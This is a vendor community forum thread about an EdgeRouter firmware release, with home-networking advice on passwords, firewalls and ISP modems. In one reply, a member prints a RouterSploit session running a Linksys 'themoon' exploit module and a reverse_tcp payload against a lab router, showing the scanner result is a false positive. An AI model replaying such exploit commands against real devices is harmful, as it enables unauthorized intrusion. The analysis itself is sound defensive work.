Reply
New Member
Posts: 6
Registered: ‎10-22-2017
Kudos: 1

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

[ Edited ]

@adminmat

 

Reports of a router coming back to life after being powered off for some hours might have to do with something timing out on the computer side rather than anything happening in the powered-off router.  Examples are a corrupt ARP cache or (for GUI access) network state data cached by the browser.  It might be worth a try to reboot the machine and/or clear the browser if you haven't done so already.

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Thanks for the info. I tried rebooting the PC several times. I did not try clearing the browser. I will try this tonight. 

New Member
Posts: 4
Registered: ‎12-29-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

[ Edited ]

@waterside
Well I tried using the exploid and got a commandprompt. I didn't want to mess up the configuration so didn't try to mess around.

 

I backed it up now and tried to tamper in some basic commands to see if changes were made.

At least the one I tried didn't have any effect (luckily) which gives me a bit of comfort.

 

I'm still puzzled why I get the shell in the first place. I'm not into shell coding so don't know if that could take advantage of the exploit?

Nevertheless I hope you guys do a quick check and get back once either a false positive OR a fix is confirmed.

Senior Member
Posts: 3,234
Registered: ‎08-06-2015
Kudos: 1383
Solutions: 186

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@milez_teg

 

What exploit did you try, and from where?  You haven't provided details.

 

The exploit as I see documented does not provide a shell.

 

And again, the exploit you referenced is specific to Linksys routers and was a vulnerability in their firmware.  This is not something that would affect an EdgeRouter which is from a completely different vendor, with different hardware, and a completely different OS/firmware.

 

Are you sure you actualy did this against an edgerouter?

 

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

So a little follow up @spaine and @iposner

 

My first edgerouter x was indeed bricked solid as my pro friend had confirmed. I exchanged it at Micro Center for a new unit. This is what I did different this time: I did not click on "Start With the Basic Setup Wizard" when the GUI opened. I clicked "No." I updated the firmware using the GUI, opened up puTTY, confirmed the update was on the unit and DID NOT REBOOT via the GUI. I clicked no. I rebooted via puTTY. After that all was good and I could connect to ERx and confirmed the update to v1.10.8. 

 

My friend thinks there was an issue with v1.9.7+hotfix.3 that caused the bricking as he noticed several issues and inconsistencies. 

 

I'm already running my AP the nanoHD and have a solid 230 Mbps at my laptops and phones. 

 

Oh and when in Micro Center I picked up a USB to TTL cable. Living 6 minutes away from MC has it's benifits. 

 

Thanks for all the suggestions. 

Emerging Member
Posts: 85
Registered: ‎06-25-2015
Kudos: 26
Solutions: 1

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@adminmat - If this is to be an internet facing router, then you MUST change the admin password BEFORE connecting it to the internet (You can also disable the ubnt account and create another admin account). This is because there are BOTS scanning the internet looking for ubiquiti routers with default passwords and uploading malware. This is especially the case if you have not started with a default wizard. I would suggest that you start with the wizard unless you have an existing config from another old router you wish to apply.
New Member
Posts: 4
Registered: ‎12-29-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@waterside

 

I took the 2x edgerouters offline and created a new seperate "lab" network.

I don't like pentesting "in the open" as it could give some legal issues IF some tool by accident did something malicious on the internet.

 

Yes, I'm 100% sure it was my 2 edgerouters (1 lite and 1 edge X) and I tested with routersploit (autopwn). It scans for a lot of known exploits on multiple vendor devices, default passwords etc. 

It only returns the: "exploits/routers/linksys/eseries_themoon_rce" as a positive.

Yesterday I tried arming it offline and injecting. I got a shell but at least I couldn't do anything usefull. This is where I don't know if it is where my skills stop or if the exploit is a "false positive" that however gives some kind of shell?

 

I'm well aware that it is a linksys exploit, however many firms tend to follow same "standards" which regardless of firms make some code/firmware somewhat similar to some extend. It might be entirely different bitwise and the standard differently interpreted, however end of the day it is the same requirements that the equipment has to follow (TCP/IP stack etc).

Anyway as I stated it might not be a big deal, but I would expect a firm like Ubnt to have high interest in doing a quick test and either fix or reply why it is a false positive Man Happy

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@iposner I did go through the wizard to set up the router after I had updated the firmware. So wizard was set up before I connected the internet cable to the Edgerouter. Would this be an issue? Why don't need to change the local router password? Even though I went through the wizard prior to connecting the internet. It should have set up a firewall, correct? 

Emerging Member
Posts: 58
Registered: ‎05-28-2018
Kudos: 16
Solutions: 3

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@adminmat

 

It is because the router can be accessed from BOTH the WLAN and LAN side!  (This allows the router to be managed by an offsite IT departmant.) 

 

In fact, Many GURUs recommand that you setup a an admistrator with a different users name and delete the default user.

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Thanks @frank1940

 

Now that I made the changes is there a way to scan for the malware? Does the malware infect the router firmware? Or just my PC? 

Emerging Member
Posts: 58
Registered: ‎05-28-2018
Kudos: 16
Solutions: 3

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Have a google using the terms   ubiquiti router malware     I didn't read the results but it looks like there could be some.  Not sure what your risk factor is as I am not sure what is actually behind your router.  Basically, is it worthwhile target-- Monetary or informational?  IF you are a typical home user, you should have a low risk factor...

Regular Member
Posts: 579
Registered: ‎11-19-2012
Kudos: 305
Solutions: 6

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Senior Member
Posts: 3,234
Registered: ‎08-06-2015
Kudos: 1383
Solutions: 186

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!


@milez_teg wrote:

Yes, I'm 100% sure it was my 2 edgerouters (1 lite and 1 edge X) and I tested with routersploit (autopwn). It scans for a lot of known exploits on multiple vendor devices, default passwords etc. 

It only returns the: "exploits/routers/linksys/eseries_themoon_rce" as a positive.

 

Unfortunately you haven't really provided much detail.  What exactly did you run?  What exactly were the results?  If you only ran autopwn then you likely are recieving false positives that need further investigation.

 

Again - the results obtained from such scanners should not be taken as fact and instead should only be used as guidance for further investigation.  Far too much time is wasted by vendors (and others) tracking down and responding to repeated blind statements that their solutions are vulnerable simply because someone ran an automated scanner that said so.  This is counter-productive and costly.

 

I took a few minutes this evening to look into this a little further.  I have been unable to obtain any shell or run any commands on an ER-Lite-3 despite mutliple repeated attempts with varying options.  One example:

rsf > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set arch mipsbe
[+] arch => mipsbe
rsf (Linksys E-Series TheMoon RCE) > set target 10.20.30.250
[+] target => 10.20.30.250
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...
[*] It is blind command injection - response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > touch /tmp/this
[*] Executing 'touch /tmp/this' on the device...

cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > set lhost 10.20.30.138
lhost => 10.20.30.138
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[-] Exploit failed to transfer payload

 

Checking the device to see if the 'touch /tmp/this' worked (it did NOT):

user@lab-erl3:/tmp$ ls -ld /tmp/this
ls: /tmp/this: No such file or directory

 

I performed a packet capture on the router while running the above and it appears the test is mistaking an HTTP 301 response as a valid response.  The exploit first sends:

	POST /tmUnblock.cgi HTTP/1.1
	Host: 10.20.30.250
	User-Agent: python-requests/2.21.0
	Accept-Encoding: gzip, deflate
	Accept: */*
	Connection: keep-alive
	Content-Length: 169
	Content-Type: application/x-www-form-urlencoded

to which the router responds:

	HTTP/1.1 301 Moved Permanently
	Location: https://10.20.30.250:443/tmUnblock.cgi
	Content-Length: 0
	Date: Mon, 31 Dec 2018 04:16:17 GMT
	Server: Server

After this response the routersploit module immediately notes

[+] Target is vulnerable

However that is incorrect and only really means that the router is responding with an expected response, which includes the 301 redirect above.  Checking the code for RouterSploit it appears to look for one of three responses:

  • 200 - OK
  • 301 - Moved Permanently
  • 302 - Found

At this point the exploit has also not actually been attempted - it is only the first check to see if the attempt should continue.

 

A further manual test shows that using the new location from the 301 response indeed results in a 404 - Not Found error, which would indicate the router is not vulnerable.

 

 

So my efforts show the router is not vulnerable, which is as expected since as already noted earlier this is different hardware running a different OS (firmware) from a different vendor.  Further, the references identified all only identify older (pre-cisco) Linksys routers and don't even hint that other devices could be impacted.

 

If you have more detail similar to what I posted above that contradicts my results then please do provide such detail.  It might actually be better to start this in a new thread if this is the case.  You noted previously that you did obtain a shell - could you do similar to what I did above posting the actual output here and also show an actual command or two that run with success, with the relevent evidence?

 

 

Emerging Member
Posts: 85
Registered: ‎06-25-2015
Kudos: 26
Solutions: 1

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@adminmat - As long as you deployed the wizard before you connected the router to the internet, you should be fine. Now that you've done that, it's prudent to disable the ubnt login, change its password and create a new admin user with a different password.

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

[ Edited ]

Thanks, yes I deployed the wizard. And made the credential changes. I found the section under the Config Tree where ports are assigned go SSH and Remote GUI access. I assume that the firewall rules override this and keep those ports closed. 

 

Doesn't the modem from my ISP have a firewall as well? The tech support guy from my ISP had me plug the modem directly into my PC to run some speed tests etc. 

 

One more question, do I have to configure any firewall rules in the AP? Or is the basic setup, SSID and password enough? 

Established Member
Posts: 969
Registered: ‎02-12-2013
Kudos: 247
Solutions: 89

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@adminmat Extremely simplified.

If the ISP supplies a modem, then normally it does not come with a firewall - but if they supply a router, then yes, it usually comes with all bells and whistles.
Many, but not all, ISP routers can be setup in bridged mode, which means all NAT/firewall are bypassed, which is preferred when using your own router.

Usually the tech support wants as little equipment as possible, when trying to help a customer. They don't want to try to fix peoples wifi problems or problems with various equipment, that's why they ask you to connect directly to the router.

Think of your AP as a switch - it usually doesn't do anything besides distributing the traffic. Firewall'ing is done on the router.
New Member
Posts: 4
Registered: ‎12-29-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@watersideAnswer is appreciated and close to my own conclusion (Despite the way you answered is a bit towards arrogant Man Wink )
Better safe than sorry, especially when I get this funny limbo-kinda console/shell whatever though there is no reply. So probably something like you said where the tool thinks the exploid is injected and basically just is sending commands towards a deaf http.

Anyway important to know it is a false positive since it elsewise would affect my recommendations until fixed.

 

Thank you for the reply and happy new year Man Wink

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Thanks @flamber and @iposner for the info. It's been up for a few days and running well. I ran an Android App called Network Analyzer on my phone (wifi off ) over the mobile LTE and it could not find any open ports. That is a good sign. 

 

I'd like to set up another small PC connected to this network. I'd like to use it for mass storage (NAS) and backups away from my main PC case AND as to run the Unifi Controller 24/7. Do you guys have a resource for ABSOLUTE NOOBS on how to do this safely and securly? Is it best just to get a Cloud Key since i'm am new at this? Will that help manage the storage?

 

and another dumb question: Does the Edgerouter OS or the AP keep track of network traffic / data when it's not running? (as in running on my PC?) 

 

 

Emerging Member
Posts: 58
Registered: ‎05-28-2018
Kudos: 16
Solutions: 3

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!


@adminmat wrote:

<<snip>>

The tech support guy from my ISP had me plug the modem directly into my PC to run some speed tests etc. 

<<snip>> 

 


The Tech support guy is not concerned about your security when he does this!  He is depending on your PC having a working software firewall running.  (And  not running that way for very long...)  Most PC's do but it is still best to have dedicated NAT/Firewall to providing most of the protection!  

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

thanks @frank1940

Reply